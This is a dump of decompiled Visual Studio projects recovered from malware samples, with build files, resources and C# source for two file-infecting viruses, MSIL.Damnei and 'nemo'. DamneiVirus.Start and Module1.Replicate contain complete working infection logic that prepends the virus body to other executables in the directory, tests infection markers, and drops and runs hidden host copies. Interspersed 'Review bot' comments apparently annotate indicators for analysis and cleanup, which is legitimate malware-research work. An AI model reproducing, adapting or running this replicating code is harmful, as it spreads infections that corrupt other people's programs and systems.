<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Genetica", "Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.csproj", "{EDF8135E-900A-4762-8C84-977F6FBD7B71}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EDF8135E-900A-4762-8C84-977F6FBD7B71}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.2213.28388")]
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: FirstPrep.Damnei
// Assembly: FirstPrep, Version=1.0.2213.28388, Culture=neutral, PublicKeyToken=null
// MVID: 46B1E01E-D7F8-4B55-B7B0-B711CAFCABC5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
namespace FirstPrep
{
public class Damnei : Form
{
private Container components = (Container) null;
public Damnei() => this.InitializeComponent();
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.AutoScaleBaseSize = new Size(5, 13);
this.ClientSize = new Size(90, 2);
this.FormBorderStyle = FormBorderStyle.FixedToolWindow;
this.MaximizeBox = false;
this.MinimizeBox = false;
this.Name = nameof (Damnei);
this.ShowInTaskbar = false;
this.Text = "MSIL.Damnei";
this.WindowState = FormWindowState.Minimized;
this.Load += new EventHandler(this.Damnei_Load);
}
[STAThread]
private static void Main() => Application.Run((Form) new Damnei());
private void Damnei_Load(object sender, EventArgs e)
{
new DamneiVirus().Start();
Application.Exit();
}
}
}
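Review bot: `InitializeComponent` and `Damnei_Load` are undocumented, and nothing tells a reader that this form is only a launcher: it is sized 90x2, starts minimized with `ShowInTaskbar = false`, and its Load handler calls `new DamneiVirus().Start()` followed by `Application.Exit()`. I would add `// ANALYSIS: hidden launcher window; all behaviour is in DamneiVirus.Start` above the class and record the window title `"MSIL.Damnei"` as a string indicator.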
@@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.SnapToGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.TrayLargeIcon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>BkRhbW5laQ==</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="$this.Locked" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.DrawGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.Localizable" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Language" mimetype="application/x-microsoft.net.object.binary.base64">
<value>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</value>
</data>
<data name="$this.GridSize" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFRTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0xLjAuNTAwMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABNTeXN0ZW0uRHJhd2luZy5TaXplAgAAAAV3aWR0aAZoZWlnaHQAAAgIAgAAAAgAAAAIAAAACw==</value>
</data>
<data name="$this.TrayHeight" mimetype="application/x-microsoft.net.object.binary.base64">
<value>UAAAAA==</value>
</data>
</root>
@@ -0,0 +1,118 @@
// Decompiled with JetBrains decompiler
// Type: FirstPrep.DamneiVirus
// Assembly: FirstPrep, Version=1.0.2213.28388, Culture=neutral, PublicKeyToken=null
// MVID: 46B1E01E-D7F8-4B55-B7B0-B711CAFCABC5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Windows.Forms;
namespace FirstPrep
{
public class DamneiVirus
{
public void Start()
{
int length = 20480;
int index1 = 8422;
string fileName = Process.GetCurrentProcess().MainModule.FileName;
byte[] numArray1 = new byte[length];
FileStream input1 = new FileStream(fileName, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
for (int index2 = 0; index2 < length; ++index2)
numArray1[index2] = binaryReader1.ReadByte();
byte[] numArray2 = new byte[input1.Length - (long) length];
int index3 = 0;
try
{
while (true)
{
numArray2[index3] = binaryReader1.ReadByte();
++index3;
}
}
catch (EndOfStreamException ex)
{
}
binaryReader1.Close();
input1.Close();
foreach (string file in Directory.GetFiles(Directory.GetCurrentDirectory(), "*.exe"))
{
try
{
AssemblyName.GetAssemblyName(file);
}
catch (BadImageFormatException ex)
{
continue;
}
try
{
FileStream input2 = new FileStream(file, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray3 = new byte[input2.Length];
int index4 = 0;
try
{
while (true)
{
numArray3[index4] = binaryReader2.ReadByte();
++index4;
}
}
catch (EndOfStreamException ex)
{
}
if ((int) numArray1[index1] == (int) numArray3[index1])
{
binaryReader2.Close();
input2.Close();
}
else
{
binaryReader2.Close();
input2.Close();
FileStream output = new FileStream(file, FileMode.Open, FileAccess.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
for (int index5 = 0; index5 < length; ++index5)
binaryWriter.BaseStream.WriteByte(numArray1[index5]);
for (int index6 = 0; index6 < numArray3.Length; ++index6)
binaryWriter.BaseStream.WriteByte(numArray3[index6]);
binaryWriter.Close();
output.Close();
}
}
catch (Exception ex)
{
}
}
string str = "temp" + new Random(DateTime.Now.Millisecond).Next(10000).ToString() + ".scr";
FileStream output1 = new FileStream(str, FileMode.Create, FileAccess.Write);
BinaryWriter binaryWriter1 = new BinaryWriter((Stream) output1);
for (int index7 = 0; index7 < numArray2.Length; ++index7)
binaryWriter1.BaseStream.WriteByte(numArray2[index7]);
binaryWriter1.Close();
output1.Close();
File.SetAttributes(str, FileAttributes.Hidden);
if (DateTime.Now.Month == 1)
{
if (DateTime.Now.Day == 21)
{
int num1 = (int) MessageBox.Show("http://www.vx-dia.de.vu/ - http://www.rrlf.de.vu/", "Infected with MSIL.Damnei by DiA/RRLF");
}
}
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
int num2 = (int) MessageBox.Show("Can not execute " + fileName, "Error");
}
File.Delete(str);
}
}
}
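Review bot: The two constants at the top of `Start` are unexplained, and the rest of the method cannot be read without them. From the visible code, `length` is the size of the block the sample reads from the front of its own file and writes in front of each target, and `index1` is the offset of the single byte compared to decide that a file is already infected, so I would annotate them `int length = 20480; // bytes of virus body prepended to each host` and `int index1 = 8422; // offset of one-byte infection marker`. Because the target's original bytes are written unchanged after that block, an infected file appears recoverable by dropping its first 20480 bytes; that belongs in a header comment for whoever writes the cleanup routine. The hidden `temp<0-9999>.scr` drop in the working directory, the `AssemblyName.GetAssemblyName` filter that limits targets to .NET assemblies, and the caption `"Infected with MSIL.Damnei by DiA/RRLF"` are the indicators worth listing there too.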
@@ -0,0 +1,46 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>FirstPrep</AssemblyName>
<ApplicationVersion>1.0.2213.28388</ApplicationVersion>
<RootNamespace>FirstPrep</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="DamneiVirus.cs" />
<Compile Include="Damnei.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Damnei.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FirstPrep", "Virus.MSIL.Small.f-d09dd4820bc9019c9d5c26971a031da48d9bca91576d2d828155cc1246f92c3a.csproj", "{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2F9E94CD-55F7-4E5F-92B1-A58B6BFC93E6}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: AssemblyTitle("nemo")]
[assembly: ComVisible(false)]
[assembly: AssemblyProduct("nemo")]
[assembly: AssemblyCopyright("Copyright © vx13d 2006")]
[assembly: AssemblyCompany("vx13d")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("78f2b18e-8e1b-4d2b-95a1-83a8bcdf2469")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,108 @@
// Decompiled with JetBrains decompiler
// Type: nemo.Module1
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace nemo
{
[StandardModule]
internal sealed class Module1
{
public static void Replicate()
{
string str = Conversions.ToString(new Random().Next(1, 1000)) + ".exe";
object obj = (object) Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
string currentDirectory = Environment.CurrentDirectory;
FileStream input1 = new FileStream(Conversions.ToString(obj), FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
byte[] numArray1 = new byte[checked ((int) input1.Length + 1)];
int num1 = checked ((int) (binaryReader1.BaseStream.Length - 1L));
int index1 = 0;
while (index1 <= num1)
{
numArray1[index1] = binaryReader1.ReadByte();
checked { ++index1; }
}
input1.Close();
binaryReader1.Close();
string[] files = Directory.GetFiles(currentDirectory, "*.exe");
int num2 = checked (files.Length - 1);
int index2 = 0;
while (index2 <= num2)
{
FileStream input2 = new FileStream(files[index2], FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray2 = new byte[checked ((int) input2.Length + 1)];
int num3 = checked ((int) (binaryReader2.BaseStream.Length - 1L));
int index3 = 0;
while (index3 <= num3)
{
numArray2[index3] = binaryReader2.ReadByte();
checked { ++index3; }
}
input2.Close();
binaryReader2.Close();
if (numArray2[60] != (byte) 128)
{
Console.WriteLine("File to infect:" + files[index2]);
FileStream output = new FileStream(files[index2], FileMode.Open, FileAccess.Write);
BinaryWriter binaryWriter = new BinaryWriter((Stream) output);
int num4 = checked (numArray1.Length - 1);
int index4 = 0;
while (index4 <= num4)
{
binaryWriter.BaseStream.WriteByte(numArray1[index4]);
checked { ++index4; }
}
int num5 = checked (numArray2.Length - 1);
int index5 = 0;
while (index5 <= num5)
{
binaryWriter.BaseStream.WriteByte(numArray2[index5]);
checked { ++index5; }
}
binaryWriter.Close();
output.Close();
}
checked { ++index2; }
}
FileInfo fileInfo = new FileInfo(Conversions.ToString(obj));
int num6 = new int();
if (checked ((int) (fileInfo.Length - 28673L)) <= 0)
return;
if (File.Exists(str))
File.Delete(str);
FileStream fileStream = new FileStream(str, FileMode.CreateNew);
File.SetAttributes(str, FileAttributes.Hidden);
int length = checked ((int) fileInfo.Length);
int index6 = 28673;
while (index6 <= length)
{
fileStream.WriteByte(numArray1[index6]);
checked { ++index6; }
}
fileStream.Close();
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
int num7 = (int) MessageBox.Show("This file is corrupt", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
ProjectData.ClearProjectError();
}
File.Delete(str);
}
[STAThread]
public static void Main() => Module1.Replicate();
}
}
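Review bot: `Replicate` leaves `60`, `128` and `28673` as bare literals, and they carry the whole infection logic. As far as the visible code shows, `numArray2[60] != (byte) 128` is the already-infected test on one byte of the candidate's header (offset 60 would be the low byte of `e_lfanew` in a PE file, to be confirmed against the sample), and `28673` is the offset at which the carried host starts inside the running file; I would comment both lines accordingly. The header comment should also say that both buffers are allocated one byte longer than the file and written out in full, so prepended copies and extracted hosts pick up trailing zero padding, which matters for anyone hashing recovered hosts. The strings `"File to infect:"` and `"This file is corrupt"` and the hidden `<1-999>.exe` drop in the working directory are the indicators to record.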
@@ -0,0 +1,23 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyApplication
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.ApplicationServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace nemo.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : ConsoleApplicationBase
{
[DebuggerNonUserCode]
public MyApplication()
{
}
}
}
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyComputer
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace nemo.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
@@ -0,0 +1,194 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MyProject
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace nemo.My
{
[HideModuleName]
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[EditorBrowsable(EditorBrowsableState.Never)]
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
internal sealed class MyForms
{
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
@@ -0,0 +1,36 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MySettings
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace nemo.My
{
[CompilerGenerated]
